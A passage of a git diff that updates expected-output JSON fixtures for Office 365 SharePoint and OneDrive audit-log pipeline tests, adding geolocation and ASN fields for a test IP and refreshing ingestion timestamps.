Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}", "code": "SharePoint", "provider": "OneDrive", @@ -90,6 +102,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -141,7 +165,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:45.953091200Z", + "ingested": "2021-12-14T14:49:42.359174092Z", "original": "{\"ClientIP\":\"67.43.156.15\",\"CorrelationId\":\"622b339f-4000-a000-f25f-92b3478c7a25\",\"CreationTime\":\"2020-02-07T16:43:53\",\"CustomUniqueId\":true,\"EventSource\":\"SharePoint\",\"Id\":\"99d005e6-a4c6-46fd-117c-08d7abeceab5\",\"ItemType\":\"Page\",\"ListItemUniqueId\":\"59a8433d-9bb8-cfef-6edc-4c0fc8b86875\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/_layouts/15/onedrive.aspx\",\"Operation\":\"PageViewed\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":4,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}", "code": "SharePoint", "provider": "OneDrive", @@ -178,6 +202,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -229,7 +265,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:45.953097300Z", + "ingested": "2021-12-14T14:49:42.359174581Z", "original": "{\"ClientIP\":\"67.43.156.15\",\"CorrelationId\":\"622b339f-4000-a000-f25f-92b3478c7a25\",\"CreationTime\":\"2020-02-07T16:43:53\",\"CustomUniqueId\":true,\"EventSource\":\"SharePoint\",\"Id\":\"99d005e6-a4c6-46fd-117c-08d7abeceab5\",\"ItemType\":\"Page\",\"ListItemUniqueId\":\"59a8433d-9bb8-cfef-6edc-4c0fc8b86875\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/_layouts/15/onedrive.aspx\",\"Operation\":\"PageViewed\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":4,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}", "code": "SharePoint", "provider": "OneDrive", @@ -266,6 +302,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -317,7 +365,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:45.953101800Z", + "ingested": "2021-12-14T14:49:42.359175080Z", "original": "{\"ClientIP\":\"67.43.156.15\",\"CorrelationId\":\"622b339f-4000-a000-f25f-92b3478c7a25\",\"CreationTime\":\"2020-02-07T16:43:53\",\"CustomUniqueId\":true,\"EventSource\":\"SharePoint\",\"Id\":\"99d005e6-a4c6-46fd-117c-08d7abeceab5\",\"ItemType\":\"Page\",\"ListItemUniqueId\":\"59a8433d-9bb8-cfef-6edc-4c0fc8b86875\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/_layouts/15/onedrive.aspx\",\"Operation\":\"PageViewed\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":4,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}", "code": "SharePoint", "provider": "OneDrive", diff --git a/packages/o365/data_stream/audit/_dev/test/pipeline/test-sharepointfileop-events.json-expected.json b/packages/o365/data_stream/audit/_dev/test/pipeline/test-sharepointfileop-events.json-expected.json index b6cf244dbcf..1e2b9c0e303 100644 --- a/packages/o365/data_stream/audit/_dev/test/pipeline/test-sharepointfileop-events.json-expected.json +++ b/packages/o365/data_stream/audit/_dev/test/pipeline/test-sharepointfileop-events.json-expected.json @@ -2,6 +2,18 @@ "expected": [ { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "url": { @@ -61,7 +73,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:46.865144800Z", + "ingested": "2021-12-14T14:49:43.390656043Z", "original": "{\"ClientIP\":\"67.43.156.15\",\"CorrelationId\":\"652b339f-908c-a000-f25f-91423da7dd9b\",\"CreationTime\":\"2020-02-07T16:44:07\",\"EventSource\":\"SharePoint\",\"Id\":\"ec04aa09-0a43-4879-cdc8-08d7abecf327\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"4803608a-df7d-4f63-aa73-67aa33bb576e\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot 2020-01-27 at 11.30.48.png\",\"Operation\":\"FileDeleted\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot 2020-01-27 at 11.30.48.png\",\"SourceRelativeUrl\":\"Documents\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}", "code": "SharePointFileOperation", "provider": "OneDrive", @@ -100,6 +112,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "url": { @@ -159,7 +183,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:46.865153400Z", + "ingested": "2021-12-14T14:49:43.390658486Z", "original": "{\"ClientIP\":\"67.43.156.15\",\"CorrelationId\":\"652b339f-908c-a000-f25f-91423da7dd9b\",\"CreationTime\":\"2020-02-07T16:44:07\",\"EventSource\":\"SharePoint\",\"Id\":\"ec04aa09-0a43-4879-cdc8-08d7abecf327\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"4803608a-df7d-4f63-aa73-67aa33bb576e\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot 2020-01-27 at 11.30.48.png\",\"Operation\":\"FileDeleted\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot 2020-01-27 at 11.30.48.png\",\"SourceRelativeUrl\":\"Documents\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}", "code": "SharePointFileOperation", "provider": "OneDrive", @@ -198,6 +222,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "url": { @@ -257,7 +293,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:46.865159200Z", + "ingested": "2021-12-14T14:49:43.390659004Z", "original": "{\"ClientIP\":\"67.43.156.15\",\"CorrelationId\":\"652b339f-90a0-a000-f25f-919afc141eb1\",\"CreationTime\":\"2020-02-07T16:44:08\",\"EventSource\":\"SharePoint\",\"Id\":\"25b08f04-48ee-4755-ce22-08d7abecf3a9\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"ff3631c1-6189-45c7-ad45-c15cea9e9255\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Forms/All.aspx\",\"Operation\":\"FileAccessed\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"aspx\",\"SourceFileName\":\"All.aspx\",\"SourceRelativeUrl\":\"Documents/Forms\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}", "code": "SharePointFileOperation", "provider": "OneDrive", @@ -296,6 +332,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "url": { @@ -355,7 +403,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:46.865163100Z", + "ingested": "2021-12-14T14:49:43.390659508Z", "original": "{\"ClientIP\":\"67.43.156.15\",\"CorrelationId\":\"652b339f-90a0-a000-f25f-919afc141eb1\",\"CreationTime\":\"2020-02-07T16:44:08\",\"EventSource\":\"SharePoint\",\"Id\":\"25b08f04-48ee-4755-ce22-08d7abecf3a9\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"ff3631c1-6189-45c7-ad45-c15cea9e9255\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Forms/All.aspx\",\"Operation\":\"FileAccessed\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"aspx\",\"SourceFileName\":\"All.aspx\",\"SourceRelativeUrl\":\"Documents/Forms\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}", "code": "SharePointFileOperation", "provider": "OneDrive", @@ -394,6 +442,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "url": { @@ -454,7 +514,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:46.865167600Z", + "ingested": "2021-12-14T14:49:43.390659931Z", "original": "{\"ClientIP\":\"67.43.156.15\",\"CorrelationId\":\"692b339f-c016-a000-f25f-990a07b2e011\",\"CreationTime\":\"2020-02-07T16:44:21\",\"EventSource\":\"SharePoint\",\"Id\":\"dac93a9f-f2fb-4cac-d18f-08d7abecfbb6\",\"ImplicitShare\":\"No\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png\",\"Operation\":\"FileUploaded\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot.png\",\"SourceRelativeUrl\":\"Documents\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}", "code": "SharePointFileOperation", "provider": "OneDrive", @@ -493,6 +553,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "url": { @@ -552,7 +624,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:46.865172500Z", + "ingested": "2021-12-14T14:49:43.390660347Z", "original": "{\"ClientIP\":\"67.43.156.15\",\"CorrelationId\":\"692b339f-902e-a000-f25f-95def5f17903\",\"CreationTime\":\"2020-02-07T16:44:23\",\"EventSource\":\"SharePoint\",\"Id\":\"5b02fadb-8eac-4aff-af87-08d7abecfca3\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png\",\"Operation\":\"FileModified\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot.png\",\"SourceRelativeUrl\":\"Documents\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}", "code": "SharePointFileOperation", "provider": "OneDrive", @@ -591,6 +663,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "url": { @@ -650,7 +734,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:46.865177200Z", + "ingested": "2021-12-14T14:49:43.390660758Z", "original": "{\"ClientIP\":\"67.43.156.15\",\"CorrelationId\":\"652b339f-908c-a000-f25f-91423da7dd9b\",\"CreationTime\":\"2020-02-07T16:44:07\",\"EventSource\":\"SharePoint\",\"Id\":\"ec04aa09-0a43-4879-cdc8-08d7abecf327\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"4803608a-df7d-4f63-aa73-67aa33bb576e\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot 2020-01-27 at 11.30.48.png\",\"Operation\":\"FileDeleted\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot 2020-01-27 at 11.30.48.png\",\"SourceRelativeUrl\":\"Documents\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}", "code": "SharePointFileOperation", "provider": "OneDrive", @@ -689,6 +773,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "url": { @@ -749,7 +845,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:46.865180800Z", + "ingested": "2021-12-14T14:49:43.390661164Z", "original": "{\"ClientIP\":\"67.43.156.15\",\"CorrelationId\":\"692b339f-c016-a000-f25f-990a07b2e011\",\"CreationTime\":\"2020-02-07T16:44:21\",\"EventSource\":\"SharePoint\",\"Id\":\"dac93a9f-f2fb-4cac-d18f-08d7abecfbb6\",\"ImplicitShare\":\"No\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png\",\"Operation\":\"FileUploaded\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot.png\",\"SourceRelativeUrl\":\"Documents\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}", "code": "SharePointFileOperation", "provider": "OneDrive", @@ -788,6 +884,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "url": { @@ -847,7 +955,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:46.865185100Z", + "ingested": "2021-12-14T14:49:43.390661577Z", "original": "{\"ClientIP\":\"67.43.156.15\",\"CorrelationId\":\"692b339f-902e-a000-f25f-95def5f17903\",\"CreationTime\":\"2020-02-07T16:44:23\",\"EventSource\":\"SharePoint\",\"Id\":\"5b02fadb-8eac-4aff-af87-08d7abecfca3\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png\",\"Operation\":\"FileModified\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot.png\",\"SourceRelativeUrl\":\"Documents\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}", "code": "SharePointFileOperation", "provider": "OneDrive", @@ -886,6 +994,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "url": { @@ -945,7 +1065,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:46.865190700Z", + "ingested": "2021-12-14T14:49:43.390661991Z", "original": "{\"ClientIP\":\"67.43.156.15\",\"CorrelationId\":\"692b339f-902e-a000-f25f-95def5f17903\",\"CreationTime\":\"2020-02-07T16:44:23\",\"EventSource\":\"SharePoint\",\"Id\":\"5b02fadb-8eac-4aff-af87-08d7abecfca3\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png\",\"Operation\":\"FileModified\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot.png\",\"SourceRelativeUrl\":\"Documents\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}", "code": "SharePointFileOperation", "provider": "OneDrive", @@ -984,6 +1104,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "url": { @@ -1043,7 +1175,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:46.865195600Z", + "ingested": "2021-12-14T14:49:43.390662420Z", "original": "{\"ClientIP\":\"67.43.156.15\",\"CorrelationId\":\"692b339f-902e-a000-f25f-95def5f17903\",\"CreationTime\":\"2020-02-07T16:44:23\",\"EventSource\":\"SharePoint\",\"Id\":\"5b02fadb-8eac-4aff-af87-08d7abecfca3\",\"ItemType\":\"File\",\"ListId\":\"2b6ad2bd-0fd7-4556-9c89-a97847085b85\",\"ListItemUniqueId\":\"7f06ab3a-bd98-41d3-a0b2-ad270d71e4d8\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/Documents/Screenshot.png\",\"Operation\":\"FileModified\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":6,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"SiteUrl\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/\",\"SourceFileExtension\":\"png\",\"SourceFileName\":\"Screenshot.png\",\"SourceRelativeUrl\":\"Documents\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"i:0h.f|membership|1003200096971f55@live.com\",\"UserType\":0,\"Version\":1,\"WebId\":\"8c5c94bb-8396-470c-87d7-8999f440cd30\",\"Workload\":\"OneDrive\"}", "code": "SharePointFileOperation", "provider": "OneDrive", diff --git a/packages/o365/data_stream/audit/_dev/test/pipeline/test-sp-sharing-op-events.json-expected.json b/packages/o365/data_stream/audit/_dev/test/pipeline/test-sp-sharing-op-events.json-expected.json index c2765e337eb..b6c75d368d2 100644 --- a/packages/o365/data_stream/audit/_dev/test/pipeline/test-sp-sharing-op-events.json-expected.json +++ b/packages/o365/data_stream/audit/_dev/test/pipeline/test-sp-sharing-op-events.json-expected.json @@ -43,7 +43,7 @@ }, "client": {}, "event": { - "ingested": "2021-12-09T13:42:49.545726200Z", + "ingested": "2021-12-14T14:49:46.421913935Z", "original": "{\"ClientIP\":\"\",\"CorrelationId\":\"4464369f-303c-b000-7cb1-c0cce4f2da18\",\"CreationTime\":\"2020-02-17T16:59:50\",\"EventData\":\"\\u003cGroup\\u003eSite Members\\u003c/Group\\u003e\",\"EventSource\":\"SharePoint\",\"Id\":\"4d1a6a2b-360c-423d-96e5-08d7b3cacd83\",\"ItemType\":\"Web\",\"ObjectId\":\"https://testsiem.sharepoint.com/sites/SIEMTest\",\"Operation\":\"AddedToGroup\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":14,\"Site\":\"9d58b52e-2adb-4976-8c1f-9932c32a8bd2\",\"SiteUrl\":\"https://testsiem.sharepoint.com/sites/SIEMTest\",\"TargetUserOrGroupName\":\"Everyone except external users\",\"TargetUserOrGroupType\":\"SecurityGroup\",\"UserAgent\":\"\",\"UserId\":\"app@sharepoint\",\"UserKey\":\"i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint\",\"UserType\":0,\"Version\":1,\"WebId\":\"54cfe39c-0e16-4f8e-bd62-f2ac40248083\",\"Workload\":\"SharePoint\"}", "code": "SharePointSharingOperation", "provider": "SharePoint", @@ -115,7 +115,7 @@ }, "client": {}, "event": { - "ingested": "2021-12-09T13:42:49.545736200Z", + "ingested": "2021-12-14T14:49:46.421940224Z", "original": "{\"ClientIP\":\"\",\"CorrelationId\":\"4464369f-303c-b000-7cb1-c0cce4f2da18\",\"CreationTime\":\"2020-02-17T16:59:50\",\"EventData\":\"\\u003cGroup\\u003eSite 